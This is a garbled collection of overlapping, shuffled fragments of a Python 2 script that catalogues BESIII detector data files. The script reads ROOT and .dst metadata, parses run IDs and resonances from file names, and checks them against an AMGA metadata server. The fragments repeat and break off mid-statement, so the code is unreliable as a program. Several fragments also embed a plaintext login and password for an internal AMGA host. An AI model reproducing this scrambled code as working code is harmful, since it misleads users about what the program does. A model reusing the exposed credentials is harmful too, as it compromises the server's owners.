"is equal to runId in rootfile if attributes[\"runId\"] == lfnInfo[\"runL\"]: runIds.append(attributes[\"runId\"]) attributes[\"runL\"] =",
"of file is in srcformat if file.endswith(format): flag = 1 return flag #Before",
"time start=time.time() obj = DataAll(\"/bes3fs/offline/data/661-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_661.root\") end = time.time() print \"661:\",str(start - end) start",
"result #get Boss version, runid, Entry number, JobOptions from root file def getCommonInfo(rootfile):",
"all attributes attributes = {} expRes = {} runIds = [] #change the",
"time #get number behiend string \"exp\" def getNum(expNum): format = re.compile(r\"\\d+\") res =",
"resonance_eventType_streamId_runL_runH_*.dst #get bossVer,runL,runH,eventNum by reading information from rootfile class Others(object): def __init__(self,dstfile,rootfile): self.dstfile",
"= %d,but runId in the root file is %d\"%(self.dstfile,lfnInfo[\"runL\"],attributes[\"runId\"]) return \"error\" else: #this",
"if res1 is not None: #get a string like:RunIdList={-10513,0,-10629} str2 = res1.group() result[\"description\"]",
"getFileSize(dstfile,format = [\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return if os.path.exists(dstfile):",
"#only including one resonance if len(resList) == 1: expRes[\"resonance\"] = resList[0] else: #has",
"result[3] not in expNumList: expNumList.append(result[3]) #resonance of this id isn't in resonance List,add",
"#print \"file\",file for format in srcformat: #if format of file is in srcformat",
"1: expRes[\"expNum\"] = expNumList[0] else: #if including several expNums,combine these expNum into mexpN1pN2p...",
"file is %d\"%(self.dstfile,lfnInfo[\"runL\"],attributes[\"runId\"]) return \"error\" else: #this dst file has several runIds,get them",
"if i!='0': runid=abs(string.atoi(i)) runIdList.append(runid) result[\"runIdList\"] = runIdList return result #get Boss version, runid,",
"ROOT.num #get TotEvtNo #commoninfo[\"TotEvtNo\"] = list(i for i in ROOT.jobInfo.getTotEvtNo()) #get JobOption commoninfo[\"jobOptions\"]",
"rootfile if attributes[\"runId\"] == lfnInfo[\"runL\"]: runIds.append(attributes[\"runId\"]) attributes[\"runL\"] = attributes[\"runId\"] attributes[\"runH\"] = attributes[\"runId\"] #get",
"root file is %d\"%(self.dstfile,lfnInfo[\"runL\"],attributes[\"runId\"]) return \"error\" else: #this dst file has several runIds,get",
"return \"error\" #set values of attribute status,streamId,Description #and these values are null #-1",
"== \"all\": if items[2] == \"All\": runId = string.atoi(items[1]) return runId else: result[\"resonance\"]",
"amga def eventTypeCheck(eventType): entries = [] client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') client.listEntries('/BES3_test/EventTypeList')",
"of each entry #under catalog \"/BES3/ExpSearch\" if runfrm<=runid<=runto: #if this runid between runfrm",
"#split \"*.dst\" by \".\" #get lfn lfn = filename.split('.')[0] return lfn #get size",
"return \"error\" else: print \"Error %s:runL in filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runL\"],runL)",
"time.time() print \"661:\",str(start - end) start = time.time() obj = DataAll(\"/bes3fs/offline/data/655-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_655.root\") end =",
"\"lfn.dst\" items=dstfile.split(\"/\") length=len(items) filename=items[length-1] #split \"*.dst\" by \".\" #get lfn lfn = filename.split('.')[0]",
"rootfile = changeFormat(self.dstfile,self.rootfile) if getFileSize(self.dstfile)<5000: print \"Content of this file is null:\",self.dstfile return",
"{} lfnInfo = {} runIds = [] #change the .dst file to .root",
"re.compile(r\"\\d+\") res = format.search(expNum) if res is not None: return res.group() #Get expNum",
"attributes[\"runL\"] = lfnInfo[\"runL\"] attributes[\"runH\"] = lfnInfo[\"runH\"] #get expNum and Resonance by calling getExpRes(runid)",
"attributes[\"LFN\"] = getLFN(self.dstfile) #get resonance,eventType,streamId,runL,runH in filename by calling splitLFN function lfnInfo =",
"number, JobOptions from root file def getCommonInfo(rootfile): commoninfo = {} gROOT.ProcessLine('gSystem->Load(\"libRootEventData.so\");') gROOT.ProcessLine('TFile file(\"%s\");'%rootfile)",
"like resonance_eventType_streamId_runL_runH_*.dst #get bossVer,runL,runH,eventNum by reading information from rootfile class Others(object): def __init__(self,dstfile,rootfile):",
"\"/BES3/ExpSearch\" if runfrm<=runid<=runto: #if this runid between runfrm and runto,and expNum isn't in",
"result[\"eventType\"] = items[1] result[\"streamId\"] = items[2] result[\"runL\"] = string.atoi(items[3]) result[\"runH\"] = string.atoi(items[4]) return",
"in AMGA\"%(self.dstfile,lfnInfo[\"eventType\"]) return \"error\" #set values of attribute status #-1 <=> value of",
"by calling splitLFN function lfnInfo = splitLFN(attributes[\"LFN\"],\"others\") #if runL is equal to runH,this",
"values are null #-1 <=> value of status is null #-1 <=> value",
"# -*- coding:utf-8 -*- # author: linlei #for data/all name of file like",
"create a .root link for .dst file def changeFormat(dstfile,rootfile,srcformat=[\".dst\",\".tag\"],destformat=[\".root\"]): flag = checkFormat(srcformat,dstfile) if",
"list(i for i in ROOT.jobInfo.getJobOptions()) #set DataType commoninfo[\"dataType\"]='dst' return commoninfo #get bossVer,eventNum,dataType,fileSize,name,eventType,expNum, #resonance,runH,runL,status,streamId,description",
"entry = client.getEntry()[0] while entry: entries.append(entry) entry = client.getEntry()[0] for entry in entries:",
"%s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print \"Error %s:runH in filename is",
"def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile = rootfile def getAttributes(self): #store all attributes",
"[] resList = [] #print\"runids\",runids client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') #get all",
"def getRunIdList(jobOptions): result = {} runIdList = [] str1=jobOptions[0] pat = re.compile(r'RunIdList= {-\\d+(,-?\\d+)+}')",
"= result[\"description\"] if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = lfnInfo[\"resonance\"] else: print \"Error %s:resonance",
"if lfnInfo[\"runL\"] == lfnInfo[\"runH\"]: #if runId in filename also is equal to runId",
"\"file\",file for format in srcformat: #if format of file is in srcformat if",
"file.endswith(format): flag = 1 return flag #Before reading information from .root file,we need",
"res1 = pat.search(str1) if res1 is not None: #get a string like:RunIdList={-10513,0,-10629} str2",
"flag==0: raise JudgeFormat(format) return if os.path.exists(dstfile): #get file's size return os.path.getsize(dstfile) #lfn like",
"getExpRes(runids): entries = [] expRes = {} expNumList = [] resList = []",
"eventTypeList in amga def eventTypeCheck(eventType): entries = [] client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client =",
"checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return #split dstfile by \"/\",then get \"lfn.dst\" items=dstfile.split(\"/\")",
"attribute runId def splitLFN(lfn,type): result = {} items = lfn.split(\"_\") if type ==",
"in filename if attributes[\"runId\"] == runId: runIds.append(attributes[\"runId\"]) #get expNum and Resonance by calling",
"expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = lfnInfo[\"resonance\"] else: print \"Error %s:resonance in filename is",
"& mc, we use new file naming rule, #file name like resonance_eventType_streamId_runL_runH_*.dst import",
"\"serveral resonance:\",resList return False #only including one expNum if len(expNumList) == 1: expRes[\"expNum\"]",
"getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #get resonance,eventType,streamId,runL,runH in filename by",
"%d,in rootfile is %d\"%(self.dstfile,lfnInfo[\"runId\"],attributes[\"runId\"]) return \"error\" #set values of attribute status,streamId,Description #and these",
"= getLFN(self.dstfile) #get resonance,eventType,streamId,runL,runH in filename by calling splitLFN function lfnInfo = splitLFN(attributes[\"LFN\"],\"others\")",
"to .root file rootfile = changeFormat(self.dstfile,self.rootfile) if getFileSize(self.dstfile)<5000: print \"Content of this file",
"#if this runid between runfrm and runto,and expNum isn't in expNumList #add this",
"\".\" #get lfn lfn = filename.split('.')[0] return lfn #get size of dst file",
"#check whether eventType is stored in eventTypeList in amga def eventTypeCheck(eventType): entries =",
"= [] str1=jobOptions[0] pat = re.compile(r'RunIdList= {-\\d+(,-?\\d+)+}') res1 = pat.search(str1) if res1 is",
"to runId in rootfile if attributes[\"runId\"] == lfnInfo[\"runL\"]: runIds.append(attributes[\"runId\"]) attributes[\"runL\"] = attributes[\"runId\"] attributes[\"runH\"]",
"all entries commoninfo[\"eventNum\"] = ROOT.num #get TotEvtNo #commoninfo[\"TotEvtNo\"] = list(i for i in",
"#check all runid whether between runfrm and runto of each entry #under catalog",
"resonance_eventType_streamId_runL_runH_*.dst import os import os.path import ROOT from ROOT import gROOT from amga",
"#function to create a .root link for .dst file def changeFormat(dstfile,rootfile,srcformat=[\".dst\",\".tag\"],destformat=[\".root\"]): flag =",
"get expNum and resonance of this file\" return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"resonance\"]",
"to this file print \"serveral resonance:\",resList return False #only including one expNum if",
"a string like:RunIdList={-10513,0,-10629} str2 = res1.group() result[\"description\"] = str2 pat = re.compile(r'-\\d+(,-?\\d+)+') list",
"is not \",self.format) #type of srcformat is list,it includes many formats def checkFormat(srcformat,file):",
"import mdclient,mdinterface import string import re import time #get number behiend string \"exp\"",
"by calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #for .dst files",
"del attributes[\"jobOptions\"] return attributes if __name__==\"__main__\": import time start=time.time() obj = DataAll(\"/bes3fs/offline/data/661-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_661.root\") end",
"one runId if lfnInfo[\"runL\"] == lfnInfo[\"runH\"]: #if runId in filename also is equal",
"this file\" return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"resonance\"] = expRes[\"resonance\"] #set RunH=RunId and",
"resList.append(result[4]) #only including one resonance if len(resList) == 1: expRes[\"resonance\"] = resList[0] else:",
"several resonances,may be has something wrong to this file print \"serveral resonance:\",resList return",
"has several runIds,get them from JobOptions by calling getRunIdList function result = getRunIdList(attributes[\"jobOptions\"])",
"from file name #file name like resonance_eventType_streamId_runL_runH_*.dst #get bossVer,runL,runH,eventNum by reading information from",
"attributes[\"description\"] = \"null\" #if resonance in filename is same as resonance that get",
"many formats def checkFormat(srcformat,file): flag = 0 #print \"file\",file for format in srcformat:",
"#client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') #get all entries under catalog \"/BES3/ExpSearch\" client.listEntries('/BES3_test/ExpSearch') entry = client.getEntry()[0]",
"and Resonance by calling getExpRes() expRes = getExpRes(runIds) if expRes == False: print",
"os.path.getsize(dstfile) #lfn like resonance_eventType_streamId_runL_runH_*,get attributes:resonance,eventType,streamId,runL,runH #lfn like run_0009947_All_file001_SFO-1,get attribute runId def splitLFN(lfn,type): result",
"= runIdList return result #get Boss version, runid, Entry number, JobOptions from root",
"rootfile class Others(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile = rootfile def getAttributes(self):",
"#get RunId commoninfo[\"runId\"] = abs(ROOT.evtHeader.getRunId()) #get all entries commoninfo[\"eventNum\"] = ROOT.num #get TotEvtNo",
"else: print \"Error %s:resonance in filename is %s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\"",
"== 1: expRes[\"resonance\"] = resList[0] else: #has several resonances,may be has something wrong",
".root file,we need to use changeFormat #function to create a .root link for",
"it to resList if result[4] not in resList: resList.append(result[4]) #only including one resonance",
"= {} runIdList = [] str1=jobOptions[0] pat = re.compile(r'RunIdList= {-\\d+(,-?\\d+)+}') res1 = pat.search(str1)",
"getFileSize function #get lfn by calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] =",
"runto,and expNum isn't in expNumList #add this expNum to expNumList if result[3] not",
"repr(\"the File's format is not \",self.format) #type of srcformat is list,it includes many",
"whether eventType is stored in eventTypeList in amga def eventTypeCheck(eventType): entries = []",
"string.atoi(result[1]) runto = string.atoi(result[2]) for runid in runids: #check all runid whether between",
"return False #only including one expNum if len(expNumList) == 1: expRes[\"expNum\"] = expNumList[0]",
"for i in ROOT.jobInfo.getTotEvtNo()) #get JobOption commoninfo[\"jobOptions\"] = list(i for i in ROOT.jobInfo.getJobOptions())",
"if attributes[\"runId\"] == runId: runIds.append(attributes[\"runId\"]) #get expNum and Resonance by calling getExpRes(runIds) expRes",
"file has several runIds,get them from JobOptions by calling getRunIdList function result =",
"{} items = lfn.split(\"_\") if type == \"all\": if items[2] == \"All\": runId",
"#judge format of file class JudgeFormat(Exception): def __init__(self, format): self.format = format def",
"return #if this rootfile has exists,then delete it if os.path.exists(rootfile): os.unlink(rootfile) #create a",
"this file is null:\",self.dstfile return \"error\" else: attributes = getCommonInfo(rootfile) #get filesize by",
"and resonance of this file\" return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = \"null\"",
"resList if result[4] not in resList: resList.append(result[4]) #only including one resonance if len(resList)",
"#get all entries under catalog \"/BES3/ExpSearch\" client.listEntries('/BES3_test/ExpSearch') entry = client.getEntry()[0] while entry: entries.append(entry)",
"attributes[\"runId\"] #get expNum and Resonance by calling getExpRes() expRes = getExpRes(runIds) if expRes",
"filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runL\"],runL) return \"error\" #get streamId from filename attributes[\"streamId\"]",
"entry client.getattr(entry,['FILE']) result = client.getEntry()[1] #compare eventType with name of each entry if",
"file only has one runId if lfnInfo[\"runL\"] == lfnInfo[\"runH\"]: #if runId in filename",
"runto of each entry #under catalog \"/BES3/ExpSearch\" if runfrm<=runid<=runto: #if this runid between",
"#get a string like:RunIdList={-10513,0,-10629} str2 = res1.group() result[\"description\"] = str2 pat = re.compile(r'-\\d+(,-?\\d+)+')",
"\"error\" #set values of attribute status #-1 <=> value of status is null",
"start = time.time() obj = DataAll(\"/bes3fs/offline/data/655-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_655.root\") end = time.time() print \"655:\",str(start - end)",
"need to change their style to integer for i in items: if i!='0':",
"lfnInfo[\"runL\"]: if runH == lfnInfo[\"runH\"]: attributes[\"runL\"] = lfnInfo[\"runL\"] attributes[\"runH\"] = lfnInfo[\"runH\"] #get expNum",
"from ExpSearch according runids def getExpRes(runids): entries = [] expRes = {} expNumList",
"getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #for .dst files of Data/All,their EventType are \"all\" attributes[\"eventType\"]",
"== lfnInfo[\"runL\"]: runIds.append(attributes[\"runId\"]) attributes[\"runL\"] = attributes[\"runId\"] attributes[\"runH\"] = attributes[\"runId\"] #get expNum and Resonance",
"flag = 0 #print \"file\",file for format in srcformat: #if format of file",
"file's size return os.path.getsize(dstfile) #lfn like resonance_eventType_streamId_runL_runH_*,get attributes:resonance,eventType,streamId,runL,runH #lfn like run_0009947_All_file001_SFO-1,get attribute runId",
"files of Data/All,their EventType are \"all\" attributes[\"eventType\"] = \"all\" #get runId from filename",
"attributes[\"status\"] = -1 attributes[\"streamId\"] = 'stream0' attributes[\"description\"] = 'null' del attributes[\"runId\"] del attributes[\"jobOptions\"]",
"not in resList: resList.append(result[4]) #only including one resonance if len(resList) == 1: expRes[\"resonance\"]",
"items=runIds.split(',') #members' style in items is string,we need to change their style to",
"#get JobOption commoninfo[\"jobOptions\"] = list(i for i in ROOT.jobInfo.getJobOptions()) #set DataType commoninfo[\"dataType\"]='dst' return",
"to use changeFormat #function to create a .root link for .dst file def",
"#get expNum and Resonance by calling getExpRes(runIds) expRes = getExpRes(runIds) if expRes ==",
"#get bossVer,runL,runH,eventNum by reading information from rootfile class Others(object): def __init__(self,dstfile,rootfile): self.dstfile =",
"integer for i in items: if i!='0': runid=abs(string.atoi(i)) runIdList.append(runid) result[\"runIdList\"] = runIdList return",
"resonance_eventType_streamId_runL_runH_*,get attributes:resonance,eventType,streamId,runL,runH #lfn like run_0009947_All_file001_SFO-1,get attribute runId def splitLFN(lfn,type): result = {} items",
"runid=abs(string.atoi(i)) runIdList.append(runid) result[\"runIdList\"] = runIdList return result #get Boss version, runid, Entry number,",
"is null attributes[\"status\"] = -1 attributes[\"streamId\"] = 'stream0' attributes[\"description\"] = 'null' del attributes[\"runId\"]",
"attributes[\"LFN\"] = getLFN(self.dstfile) #for .dst files of Data/All,their EventType are \"all\" attributes[\"eventType\"] =",
"= string.atoi(items[1]) return runId else: result[\"resonance\"] = items[0] result[\"eventType\"] = items[1] result[\"streamId\"] =",
"has one runId if lfnInfo[\"runL\"] == lfnInfo[\"runH\"]: #if runId in filename also is",
"from filename attributes[\"streamId\"] = lfnInfo[\"streamId\"] #check eventType in filename evtType_exists = eventTypeCheck(lfnInfo[\"eventType\"]) if",
"#get filesize by calling getFileSize function #get lfn by calling getLFN function attributes[\"fileSize\"]",
"formats def checkFormat(srcformat,file): flag = 0 #print \"file\",file for format in srcformat: #if",
"filesize by calling getFileSize function #get lfn by calling getLFN function attributes[\"fileSize\"] =",
"#return run_0023474_All_file007_SFO-2 def getLFN(dstfile,format=[\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return #split",
"\"runId of %s,in filename is %d,in rootfile is %d\"%(self.dstfile,lfnInfo[\"runId\"],attributes[\"runId\"]) return \"error\" #set values",
"this expNum to expNumList if result[3] not in expNumList: expNumList.append(result[3]) #resonance of this",
"pat = re.compile(r'-\\d+(,-?\\d+)+') list = pat.search(str2) if list is not None: #get a",
"__init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile = rootfile def getAttributes(self): #store all attributes attributes",
"getExpRes() expRes = getExpRes(runIds) if expRes == False: print \"Can't get expNum and",
"runid in runids: #check all runid whether between runfrm and runto of each",
"#get all entries commoninfo[\"eventNum\"] = ROOT.num #get TotEvtNo #commoninfo[\"TotEvtNo\"] = list(i for i",
"expNumList[1:]: str = str + \"p+\" + getNum(expNum) expRes[\"expNum\"] = str return expRes",
"and runto of each entry #under catalog \"/BES3/ExpSearch\" if runfrm<=runid<=runto: #if this runid",
"= [] #print\"runids\",runids client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') #get all entries under",
"flag = 1 return flag #Before reading information from .root file,we need to",
"in ROOT.jobInfo.getJobOptions()) #set DataType commoninfo[\"dataType\"]='dst' return commoninfo #get bossVer,eventNum,dataType,fileSize,name,eventType,expNum, #resonance,runH,runL,status,streamId,description class DataAll(object): def",
"status is null attributes[\"status\"] = -1 del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes if",
"print \"Error:\",this.dstfile return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = result[\"description\"] if expRes[\"resonance\"] ==",
"calling getExpRes(runid) expRes = getExpRes(result[\"runIdList\"]) if expRes == False: print \"Error:\",this.dstfile return \"error\"",
"True return False #judge format of file class JudgeFormat(Exception): def __init__(self, format): self.format",
"runIdList.append(runid) result[\"runIdList\"] = runIdList return result #get Boss version, runid, Entry number, JobOptions",
"result = client.getEntry()[1] #compare eventType with name of each entry if eventType ==",
"return True return False #judge format of file class JudgeFormat(Exception): def __init__(self, format):",
"\"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = result[\"description\"] if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] =",
"import gROOT from amga import mdclient,mdinterface import string import re import time #get",
"not None: #get a string like:RunIdList={-10513,0,-10629} str2 = res1.group() result[\"description\"] = str2 pat",
"= list(i for i in ROOT.jobInfo.getTotEvtNo()) #get JobOption commoninfo[\"jobOptions\"] = list(i for i",
"= {} expRes = {} runIds = [] #change the .dst file to",
"attributes[\"description\"] = 'null' del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes #get resonance,runL,runH,eventType,streamId,LFN from file",
"items is string,we need to change their style to integer for i in",
"%d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runH\"],runH) return \"error\" else: print \"Error %s:runL in filename is",
"RunId commoninfo[\"runId\"] = abs(ROOT.evtHeader.getRunId()) #get all entries commoninfo[\"eventNum\"] = ROOT.num #get TotEvtNo #commoninfo[\"TotEvtNo\"]",
"def eventTypeCheck(eventType): entries = [] client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') client.listEntries('/BES3_test/EventTypeList') entry",
"amga client.getattr(item,['Id','runFrm','runTo','expNum','resonance']) result = client.getEntry()[1] # print item # print result runfrm =",
"= client.getEntry()[1] # print item # print result runfrm = string.atoi(result[1]) runto =",
"from amga import mdclient,mdinterface import string import re import time #get number behiend",
"#set values of attribute status #-1 <=> value of status is null attributes[\"status\"]",
"and Resonance by calling getExpRes(runIds) expRes = getExpRes(runIds) if expRes == False: print",
"\"Error %s:runL in filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runL\"],runL) return \"error\" #get streamId",
"\"Error %s:runH in filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runH\"],runH) return \"error\" else: print",
"get \"lfn.dst\" items=dstfile.split(\"/\") length=len(items) filename=items[length-1] #split \"*.dst\" by \".\" #get lfn lfn =",
"entry if eventType == result[0]: return True return False #judge format of file",
"filename=items[length-1] #split \"*.dst\" by \".\" #get lfn lfn = filename.split('.')[0] return lfn #get",
"#get name of each entry client.getattr(entry,['FILE']) result = client.getEntry()[1] #compare eventType with name",
"return False #judge format of file class JudgeFormat(Exception): def __init__(self, format): self.format =",
"__str__(self): return repr(\"the File's format is not \",self.format) #type of srcformat is list,it",
"#get lfn lfn = filename.split('.')[0] return lfn #get size of dst file def",
"lfnInfo[\"resonance\"]: attributes[\"resonance\"] = expRes[\"resonance\"] else: print \"Error %s:resonance in filename is %s,in ExpSearch",
"#change the .dst file to .root file rootfile = changeFormat(self.dstfile,self.rootfile) if getFileSize(self.dstfile)<5000: print",
"each entry client.getattr(entry,['FILE']) result = client.getEntry()[1] #compare eventType with name of each entry",
"not \",self.format) #type of srcformat is list,it includes many formats def checkFormat(srcformat,file): flag",
"TEvtHeader();') gROOT.ProcessLine('branch->SetAddress(&jobInfo);') gROOT.ProcessLine('branch1->SetAddress(&evtHeader);') gROOT.ProcessLine('branch->GetEntry(0);') gROOT.ProcessLine('branch1->GetEntry(0);') gROOT.ProcessLine('Int_t num=tree1.GetEntries()') #get Boss Version commoninfo[\"bossVer\"] = ROOT.jobInfo.getBossVer()",
"#dstfile like /bes3fs/offline/data/655-1/4040/dst/110504/run_0023474_All_file007_SFO-2.dst, #return run_0023474_All_file007_SFO-2 def getLFN(dstfile,format=[\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0: raise",
"gROOT.ProcessLine('branch->SetAddress(&jobInfo);') gROOT.ProcessLine('branch1->SetAddress(&evtHeader);') gROOT.ProcessLine('branch->GetEntry(0);') gROOT.ProcessLine('branch1->GetEntry(0);') gROOT.ProcessLine('Int_t num=tree1.GetEntries()') #get Boss Version commoninfo[\"bossVer\"] = ROOT.jobInfo.getBossVer() #get",
"= mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') #get all entries under catalog \"/BES3/ExpSearch\" client.listEntries('/BES3_test/ExpSearch') entry = client.getEntry()[0] while",
"= getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #for .dst files of Data/All,their EventType are \"all\"",
"print item # print result runfrm = string.atoi(result[1]) runto = string.atoi(result[2]) for runid",
"#resonance of this id isn't in resonance List,add it to resList if result[4]",
"= [] resList = [] #print\"runids\",runids client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') #get",
"commoninfo #get bossVer,eventNum,dataType,fileSize,name,eventType,expNum, #resonance,runH,runL,status,streamId,description class DataAll(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile =",
"\"661:\",str(start - end) start = time.time() obj = DataAll(\"/bes3fs/offline/data/655-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_655.root\") end = time.time() print",
"bossVer,runL,runH,eventNum by reading information from rootfile class Others(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile",
"{-\\d+(,-?\\d+)+}') res1 = pat.search(str1) if res1 is not None: #get a string like:RunIdList={-10513,0,-10629}",
"Others(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile = rootfile def getAttributes(self): #store all",
"%d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runL\"],runL) return \"error\" #get streamId from filename attributes[\"streamId\"] = lfnInfo[\"streamId\"]",
"if getFileSize(self.dstfile)<5000: print \"Content of this file is null:\",self.dstfile return \"error\" else: attributes",
"end = time.time() print \"661:\",str(start - end) start = time.time() obj = DataAll(\"/bes3fs/offline/data/655-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_655.root\")",
"#get streamId from filename attributes[\"streamId\"] = lfnInfo[\"streamId\"] #check eventType in filename evtType_exists =",
"= ROOT.num #get TotEvtNo #commoninfo[\"TotEvtNo\"] = list(i for i in ROOT.jobInfo.getTotEvtNo()) #get JobOption",
"#if runL is equal to runH,this file only has one runId if lfnInfo[\"runL\"]",
"in items: if i!='0': runid=abs(string.atoi(i)) runIdList.append(runid) result[\"runIdList\"] = runIdList return result #get Boss",
"= {} expRes = {} lfnInfo = {} runIds = [] #change the",
"result[\"runIdList\"] = runIdList return result #get Boss version, runid, Entry number, JobOptions from",
"filename is not stored in AMGA\"%(self.dstfile,lfnInfo[\"eventType\"]) return \"error\" #set values of attribute status",
"JudgeFormat(destformat) return #if this rootfile has exists,then delete it if os.path.exists(rootfile): os.unlink(rootfile) #create",
"list,it includes many formats def checkFormat(srcformat,file): flag = 0 #print \"file\",file for format",
"str return expRes #check whether eventType is stored in eventTypeList in amga def",
"\"Error %s:resonance in filename is %s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print",
"is %s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print \"Error %s:runH in filename",
"def changeFormat(dstfile,rootfile,srcformat=[\".dst\",\".tag\"],destformat=[\".root\"]): flag = checkFormat(srcformat,dstfile) if flag==0: raise JudgeFormat(srcformat) return flag = checkFormat(destformat,rootfile)",
"is null:\",self.dstfile return \"error\" else: attributes = getCommonInfo(rootfile) #get filesize by calling getFileSize",
"isn't in resonance List,add it to resList if result[4] not in resList: resList.append(result[4])",
"= client.getEntry()[1] #compare eventType with name of each entry if eventType == result[0]:",
"by \"/\",then get \"lfn.dst\" items=dstfile.split(\"/\") length=len(items) filename=items[length-1] #split \"*.dst\" by \".\" #get lfn",
"pat.search(str1) if res1 is not None: #get a string like:RunIdList={-10513,0,-10629} str2 = res1.group()",
"#get runIdList from JobOptions def getRunIdList(jobOptions): result = {} runIdList = [] str1=jobOptions[0]",
"is not None: return res.group() #Get expNum and resonance from ExpSearch according runids",
"gROOT from amga import mdclient,mdinterface import string import re import time #get number",
"#get file's size return os.path.getsize(dstfile) #lfn like resonance_eventType_streamId_runL_runH_*,get attributes:resonance,eventType,streamId,runL,runH #lfn like run_0009947_All_file001_SFO-1,get attribute",
"number behiend string \"exp\" def getNum(expNum): format = re.compile(r\"\\d+\") res = format.search(expNum) if",
"between runfrm and runto of each entry #under catalog \"/BES3/ExpSearch\" if runfrm<=runid<=runto: #if",
"filename is same as resonance that get from ExpSearch if expRes[\"resonance\"] == lfnInfo[\"resonance\"]:",
"client.getEntry()[0] if entries is None: print \"ExpSearch directory is empty, please run createBesDir",
"dst file def getFileSize(dstfile,format = [\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format)",
"value of Description is null attributes[\"status\"] = -1 attributes[\"streamId\"] = 'stream0' attributes[\"description\"] =",
"del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes if __name__==\"__main__\": import time start=time.time() obj =",
"#get Boss version, runid, Entry number, JobOptions from root file def getCommonInfo(rootfile): commoninfo",
"is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print \"Error %s:runH in filename is %d,in jobOptions",
"filename evtType_exists = eventTypeCheck(lfnInfo[\"eventType\"]) if evtType_exists == True: attributes[\"eventType\"] = lfnInfo[\"eventType\"] else: print",
"not stored in AMGA\"%(self.dstfile,lfnInfo[\"eventType\"]) return \"error\" #set values of attribute status #-1 <=>",
"if expRes == False: print \"Can't get expNum and resonance of this file\"",
"#for data/skim & mc, we use new file naming rule, #file name like",
"attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes #get resonance,runL,runH,eventType,streamId,LFN from file name #file name like",
"checkFormat(destformat,rootfile) if flag==0: raise JudgeFormat(destformat) return #if this rootfile has exists,then delete it",
"= string.atoi(result[1]) runto = string.atoi(result[2]) for runid in runids: #check all runid whether",
"information from rootfile class Others(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile = rootfile",
